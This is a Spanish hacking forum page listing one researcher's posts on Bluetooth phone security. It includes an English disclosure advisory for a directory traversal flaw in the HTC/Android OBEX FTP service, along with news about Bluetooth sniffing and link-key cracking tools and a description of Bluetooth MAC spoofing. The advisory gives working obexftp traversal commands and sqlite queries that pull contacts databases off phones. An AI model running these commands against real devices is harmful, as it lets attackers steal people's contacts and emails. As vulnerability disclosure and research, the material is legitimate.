elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.



Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware

  Mostrar Temas
Páginas: [1] 2 3
1  Comunicaciones / Hacking Mobile / HTC / Android OBEX FTP Service Directory Traversal Vulnerability en: 26 Julio 2011, 10:43 am
Aquí podéis encontrar el informe completo de la vulnerabilidad.

Title: HTC / Android OBEX FTP Service Directory Traversal

Author: Alberto Moreno Tablado

Vendor: HTC
Vulnerable  Products:

- HTC devices running Android 2.1

- HTC devices running Android 2.2


HTC devices running Android 2.1 and Android 2.2 are prone to a directory traversal vulnerability in the Bluetooth OBEX FTP Service. Exploiting this issue allows a remote authenticated attacker to list arbitrary directories, and read arbitrary files, via a ../ in a pathname.


In the present HTC / Android phones include a Bluetooth stack, which provides Bluetooth communications with other remote devices. The File Transfer Profile (OBEX FTP) is one among all the Bluetooth services that may be implemented in the stack.

The OBEX FTP service is a software implementation of the File Transfer Profile (FTP). The File Transfer Profile (FTP) is intended for data exchange and it is based on the OBEX communications client-server protocol. The service is present in a large number of Bluetooth mobile phones. This service can be used for sending files from the phone to other remote devices and also allows remote devices to browse shared folders and download files from the phone.

In HTC / Android phones, the default directory of the OBEX FTP Server is the SDCard. Only files placed in the directory of the SDCard can be shared. The user cannot select other directory so sensitive files related to the operating system are not exposed.

There exists a Directory Traversal vulnerability in the OBEX FTP Service in the Bluetooth Stack implemented in HTC devices running Android 2.1 and Android 2.2. The OBEX FTP Server is a 3rd party driver developed by HTC and installed on HTC devices running Android operating system, so the vulnerability affects to this vendor specifically.

A remote attacker (who previously owned authentication and authorization rights) can use tools like ObexFTP or gnomevfs-ls over Linux to traverse to parent directories out of the default Bluetooth shared folder by using ../ or ..\\ marks.

The only requirement is that the attacker must have authentication and authorization privileges over Bluetooth. Pairing up with the remote device should be enough to get it. However, more sophisticated attacks, such as sniffing the Bluetooth pairing, linkkey cracking and MAC address spoofing, can be used in order to avoid this. In case the attacker succeeded in getting the proper privileges, further actions will be transparent to the user.

Scope of the attack

The Directory Traversal vulnerability allows a remote attacker to browse folders located anywhere in the file system and download any file contained in any folder.

1) List arbitrary directories

Any directory within the file system of the phone can be browsed, beyond the limits of the default shared folder (the SDCard).

The following example is the output of a command for listing a directory with ObexFTP. Given the Bluetooth MAC address of an HTC / Android based mobile phone and the path ../, the command retrieves the content of the parent of the default directory of the FTP server, this is the root directory of the disk file system:

gospel@ubuntu:~$ obexftp -b 90:21:55:8C:2C:3A -l "../"
Browsing 90:21:55:8C:2C:3A ...
Tried to connect for 29ms
Receiving "../"... Sending ".."...|done
/<?xml version="1.0"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
  <folder name="sqlite_stmt_journals"/>
  <folder name="config"/>
  <folder name="sdcard"/>
  <folder name="d"/>
  <folder name="etc"/>
  <folder name="cache"/>
  <folder name="system"/>
  <folder name="sys"/>
  <folder name="sbin"/>
  <folder name="proc"/>
  <file name="logo.rle" size="11336" user-perm="R" created="19700101T090000Z"/>
  <file name="init.rc" size="14664" user-perm="R" created="19700101T090000Z"/>
  <file name="init.goldfish.rc" size="1677" user-perm="R" created="19700101T090000Z"/>
  <file name="init.buzz.rc" size="3608" user-perm="R" created="19700101T090000Z"/>
  <file name="init" size="107668" user-perm="R" created="19700101T090000Z"/>
  <file name="default.prop" size="118" user-perm="R" created="19700101T090000Z"/>
  <folder name="data"/>
  <folder name="root"/>
  <folder name="dev"/>

2) Read arbitrary files

Any file located in the file system can be downloaded. This may lead to access confidential data such as contacts, messages, emails or temporary internet files.

- Emails from Google account downloaded via GMAIL application, located in /data/data/com.google.android.providers.gmail/databases/mailstore.*****@gmail.com.db
- Contacts database, located in /data/data/com.android.providers.contacts/databases/contacts2.db.

The following example is the output of a command for downloading a file with ObexFTP. Given the Bluetooth MAC address of an HTC / Android based mobile phone and the pathname ../data/data/com.android.providers.contacts/databases/contacts2.db, the command retrieves the contacts database:

gospel@ubuntu:~$ obexftp -b 90:21:55:8C:2C:3A -g "../data/data/com.android.providers.contacts/databases/contacts2.db"
Browsing 90:21:55:8C:2C:3A ...
Tried to connect for 50ms
Receiving "../data/data/com.android.providers.contacts/databases/contacts2.db"... Sending ".."...|Sending "data".../Sending "data"...-Sending "com.android.providers.contacts"...\Sending "databases"...|done

Once the database is downloaded, contacts can be queried with SQL:

gospel@ubuntu:~$ ./sqlite3 contacts2.db "SELECT data.data1 from data INNER JOIN raw_contacts ON data.raw_contact_id = raw_contacts._id WHERE raw_contacts.account_type='com.htc.android.pcsc'"
Philip J. Fry

Also contacts synced from Google and Facebook accounts can be queried from the same database:

gospel@ubuntu:~$ ./sqlite3 contacts2.db "SELECT data.data1 from data INNER JOIN raw_contacts ON data.raw_contact_id = raw_contacts._id WHERE raw_contacts.account_type='com.htc.socialnetwork.facebook'"
Aitana *******
Aitana *******

Affected products

- HTC devices running Android 2.1
- HTC devices running Android 2.2

The following products were tested and showed to be vulnerable: HTC Wildfire A3333, Softbank 001HT (HTC Desire HD), EMobile S31HT (HTC Aria).

Vendor status

This vulnerability is related to CVE-2009-0244, a vulnerability announced in 2009 affecting HTC devices running Windows Mobile 6 and Windows Mobile 6.1 and reported to HTC Europe. After the vulnerability was disclosed, HTC issued security hotfixes under the name <span style="font-style:italic;">Hotfix to enhance the security mechanism of Bluetooth service</span> for all the affected products. HTC reproduced the same security flaw in Android phones shipped throughout 2010 and 2011.

The current advisory was reported to HTC Japan in 2011/02. Subsequently, it was reported to HTC Europe in 2011/04 in order to obtain more feedback and re-attempt the collaboration. In both cases I failed to coordinate the disclosure of the advisory and release of the hotfix so finally I am forced to go public with all the information undisclosed.

The vulnerability is published as a zero-day threat. This means that all HTC devices running Android 2.1 and Android 2.2 shipped up to date July 2011 may be vulnerable and a security hotfix has not been issued by the manufacturer yet.

Users of HTC Android phones may expect to receive a notification for security update over-the-air regarding to this vulnerability, or find the latest updates in the support site.

Do not accept pairing nor connection requests from unknown sources. Delete old entries in the paired devices list.

HTC Wildfire, HTC Desire HD and HTC Aria are trademarks of HTC Corporation (HTC). Softbank 001HT is a trademark of SOFTBANK Corp. EMobile S31HT is a trademark of EMOBILE Ltd.
2  Comunicaciones / Hacking Mobile / [Bluetooth] Avances en sniffing Bluetooth en: 16 Agosto 2007, 22:30 pm

Esta semana se han producido dos grandes avances en relación con la capacidad para sniffar comunicaciones Bluetooth.

Recordemos que sniffar comunicaciones Bluetooth es un tema bastante complicado debido a que:

1) La técnica de salto de frecuencias impide a cualquier dispositivo que no forme parte de la piconet (que no esté emparejado con el maestro) escuchar las comunicaciones, ya que no tiene acceso a la tabla de saltos utilizada para la transmisión de paquetes.

2) Los adaptadores USB Bluetooth convencionales no se pueden poner en modo promiscuo (como las tarjetas Ethernet o Wi-Fi). Hasta el momento, existían adaptadores con capacidad para ponerse en modo promiscuo, sniffers, pero su precio rondaba los 1000$ en el mercado extranjero.

Durante el pasado evento 23C3, Thierry Zoller publicó la herramienta BTCrack para Windows. BTCrack es un programa que permite crackear el PIN y la clave de enlace compartidos por dos dispositivos a partir de las tramas capturadas durante el emparejamiento de ambos. El software existía, lo dificil y caro era conseguir el hardware que sniffara esas tramas. En aquel momento, Zoller hizo un llamamiento para encontrar una técnica que permitiera construir un sniffer Bluetooth de bajo coste.

Max Moser acudió al llamamiento y publicó un paper en el que desmontaba el mito de que conseguir un sniffer Bluetooth sólo era posible adquiriendo carísimos productos propietarios. Realizando ingeniería inversa del producto FTS4BT fue capaz de flashear un adaptador USB Bluetooth convencional con el firmware del sniffer comercial. La aplicación reconocía el hardware como parte del paquete comercial y permitía sniffar.

El procedimiento de construir un sniffer Bluetooth a partir de un adaptador USB Bluetooth convencial podía desarrollarse en Linux, pero para enviar comandos al hardware y sniffar con él hacía falta el producto comercial para Windows.

Pues bien, la primera noticia es la publicación de una herramienta que permite enviar comandos al adaptador hardware y utilizarlo para sniffar. El nombre de esta herramienta es BTSniff y está disponible para Linux. El autor es Andrea (aka sorbo) @ http://darkircop.org/.

BTSniff consta de dos partes:

- Ensamblador para construir tu propio firmware
- Frontline para envío de comandos: sincronizar con el maestro, sniffar tramas, ...

En principio, BTSniff sólo funciona con adaptadores USB Bluetooth con chipset CSR que han sido flasheados con el firmware del sniffer comercial.

La otra noticia es que BTCrack ya dispone de versión para Linux, aunque aún no se ha hecho pública. Supongo que con la publicación de BTSniff, Zoller no hubiera tardado en hacer pública también esa versión y rematar la exclusiva en seguridad Bluetooth, si no fuera por la reciente ley §202C StGB que acaba de aprobarse en Alemania y que prohibe la distribución de herramientas que pueden ser utilizadas con fines de hacking.

Gracias a estos dos avances, el sniffing de comunicaciones Bluetooth está más cerca de ser una realidad (no un simple PoC) y estar al alcance de cualquiera. (Aunque, ¿eso es bueno?). En cualquier caso, la nueva especificación 2.1 de Bluetooth que acaba de ser publicada por el SIG introduce algunas mejoras en seguridad supuestamente dirigidas a evitar el sniffing de las comunicaciones Bluetooth. No obstante, de aquí a que la especificación 2.1 domine el mercado de los teléfonos móviles aún quedan años de diversión :)

¿Y para qué sirve todo esto? Diréis lo no iniciados en seguridad Bluetooth...

Os cuento: Gracias a BTSniff, un atacante podrá sincronizarse con el maestro de una piconet y sniffar las tramas transmitidas durante una comunicación Bluetooth con otro dispositivo. Lo interesante sería llevarlo a cabo durante el emparejamiento de dos dispositivos Bluetooth. Capturando estas tramas, el atacante tendría acceso a las keys generadas en el proceso de emparejamiento y podría obtener la clave de enlace Bluetooth a partir de las mismas con ayuda de BTCrack. Con la clave de enlace en su poder, el dispositivo atacante podría acceder de forma transparente a cualquiera de los dos dispositivos suplantando la BD_ADDR del otro dispositivo y utilizando la clave de enlace crackeada. El acceso transparente implica poder conectarse a cualquier perfil del dispositivo objetivo saltándose los mecanismos de seguridad de Bluetooth de autenticación y autorización, tal y como se explica en el ataque BD_ADDR Spoofing. Las posibilidades: muy "interesantes"... como el acceso a los comandos AT (realizar llamadas de teléfono, gestión de la agenda de contactos, gestión de mensajes SMS, ...) o el acceso al servicio OBEX para el robo de archivos del teléfono móvil.

Ya era hora de que apareciese alguna novedad en el mundo de la seguridad Bluetooth, después de que la cosa haya estado parada durante un año. ¡Buenas noticias!

Actualización... dicho y hecho.


3  Comunicaciones / Hacking Mobile / MOVIDO: Radio por bluetooh?¿ en: 6 Agosto 2007, 00:19 am
El tema ha sido movido a Dudas Generales.

4  Comunicaciones / Hacking Mobile / MOVIDO: bluetooth compatible con gnu/linux en: 2 Agosto 2007, 14:20 pm
El tema ha sido movido a Dudas Generales.

5  Comunicaciones / Hacking Mobile / MOVIDO: bluesoleil?? en: 1 Agosto 2007, 13:33 pm
El tema ha sido movido a Dudas Generales.

6  Comunicaciones / Hacking Mobile / MOVIDO: no puedo usar bluetooth de portatil en: 2 Junio 2007, 19:23 pm
El tema ha sido movido a Hardware.

7  Comunicaciones / Hacking Mobile / [Bluetooth] Ataque Blue MAC Spoofing en: 4 Mayo 2007, 11:42 am
Revisión del ataque Blue MAC Spoofing - ¿Todavía piensas que Bluetooth es seguro?

La mayoría de usuarios de teléfonos móviles Bluetooth ha tenido la necesidad alguna vez de emparejar su teléfono con otro dispositivo con el fin de transferir archivos vía Bluetooth o conectarse a equipos manos libres o receptores GPS. Es un hecho que la conducta habitual suele ser mantener esos enlaces activos aun cuando estos se encuentren en desuso o la conexión haya sido esporádica. ¿Qué ocurriría si cada uno de esos enlaces activos pudiera convertirse en una puerta trasera a nuestro teléfono, con acceso transparente al control total de las funciones del teléfono y los archivos almacenados? En efecto, dado que todos los mecanismos de seguridad empleados por Bluetooth se realizan a nivel de dispositivo, y no de usuario, suplantar la identidad de un dispositivo emparejado y utilizar sus credenciales de confianza para acceder a un teléfono sin que el usuario se percate resulta una acción trivial. En esto consiste el ataque Blue MAC Spoofing.

Acabo de publicar un artículo sobre el ataque Blue MAC Spoofing. No hay casi nada documentado sobre este ataque en la red y es importante darlo a conocer ya que, a mi juicio, se trata de uno de los ataques más peligrosos en materia de seguridad Bluetooth.
- Todos los dispositivos Bluetooth son vulnerables a este ataque, al tratarse de una vulnerabilidad intrínseca al estándar y no debida a una incorrecta implementación del fabricante, como en los ataques a teléfonos móviles anteriormente descubiertos.
- Suplantar la dirección MAC de un dispositivo Bluetooth en Linux es trivial, con bdaddr.
- Consecuencia del robo de claves de enlace: If your box gets owned, your phone may, too.
- Elevado impacto para el usuario atacado: Acceso a comandos AT y al sistema de archivos del teléfono.

8  Comunicaciones / Hacking Mobile / Conferencia Seguridad Mobile @ Alcolea Party 2007 en: 15 Marzo 2007, 12:11 pm
Conferencia Seguridad Mobile: Amenazas en teléfonos móviles y Smartphones, por Alberto Moreno

9  Comunicaciones / Hacking Mobile / [Bluetooth] MOTOHCKR: Hacking Bluetooth en teléfonos móviles Motorola en: 5 Diciembre 2006, 18:11 pm
Artículo MOTOHCKR: Hacking Bluetooth en teléfonos móviles Motorola de última generación
Fuente: http://gospel.endorasoft.es/bluetooth/seguridad-bluetooth/Files/MOTOHCKR_Hacking.Bluetooth.en.telefonos.moviles.Motorola.pdf
Mirror: http://www.telefonica.net/web2/telamarinera/docus/MOTOHCKR_Hacking.Bluetooth.en.telefonos.moviles.Motorola.pdf

Video MOTOHCKR: PEBL own3d


Los teléfonos móviles Motorola son conocidos en todo el mundo por su elevada sofisticación y atractivo diseño. Desde el lanzamiento del Motorola RAZR V3 en 2005, la compañía se ha mantenido a la vanguardia en la fabricación de teléfonos móviles para gran consumo, comercializando modelos de excelente calidad en rendimiento y usabilidad y con un diseño revolucionario caracterizado por la delgadez y elegancia de sus formas.

Todos los teléfonos móviles Motorola de última generación incorporan tecnología Bluetooth para el intercambio de archivos con otros teléfonos y el uso de equipos manos libres. Así mismo, estos modelos incorporan ciertas medidas de seguridad básicas que facilitan la protección de los usuarios frente a ataques Bluetooth. Algunas de estas medidas son mantener por defecto la visibilidad del dispositivo en modo oculto, para evitar que este sea descubierto por otros equipos; implantar un temporizador de 60 segundos que evite mantener Bluetooth activado mientras el usuario no esté haciendo uso de esta funcionalidad o denegar automáticamente conexiones provenientes de equipos desconocidos.

Sin embargo, a pesar de incorporar estas medidas de seguridad básicas, se han encontrado ciertas vulnerabilidades en el interfaz Bluetooth de los teléfonos móviles Motorola de última generación que permitirían a un atacante comprometer la seguridad de estos dispositivos y la privacidad del usuario.

Todos los modelos vulnerables a este tipo de ataques siguen siendo comercializados hoy en día; algunos de ellos incluso gozan de gran popularidad.

Es materia de este documento dar a conocer estas vulnerabilidades y concienciar a los usuarios de teléfonos móviles Motorola de lo importante que resulta utilizar la funcionalidad de Bluetooth de forma segura.
10  Comunicaciones / Hacking Mobile / Conferencia Bluetooth Hacking @ Hackmeeting06 en: 22 Octubre 2006, 16:28 pm

El pasado 14 de Octubre, con ocasión del encuentro Hackmeeting06, Hackiluro, en Mataró, Barcelona, tuve la oportunidad de ofrecer una charla sobre Seguridad en Bluetooth titulada "Bluetooth Hacking: Seguridad en teléfonos móviles Bluetooth".

Durante la charla se habló de especificación Bluetooth, identificación de dispositivos, vulnerabilidades en teléfonos móviles y se hicieron demos en vivo de ataques a teléfonos reales.

Agradezco a todos los asistentes su participación, en especial a la gente de elhacker: Brujo, MadAntrax, Ertai y Anelkaos.

Podéis acceder al material de la charla en los siguientes links:

Briefing - Informe de contenidos:


Audio de la charla:

Video demo en acción:

Páginas: [1] 2 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines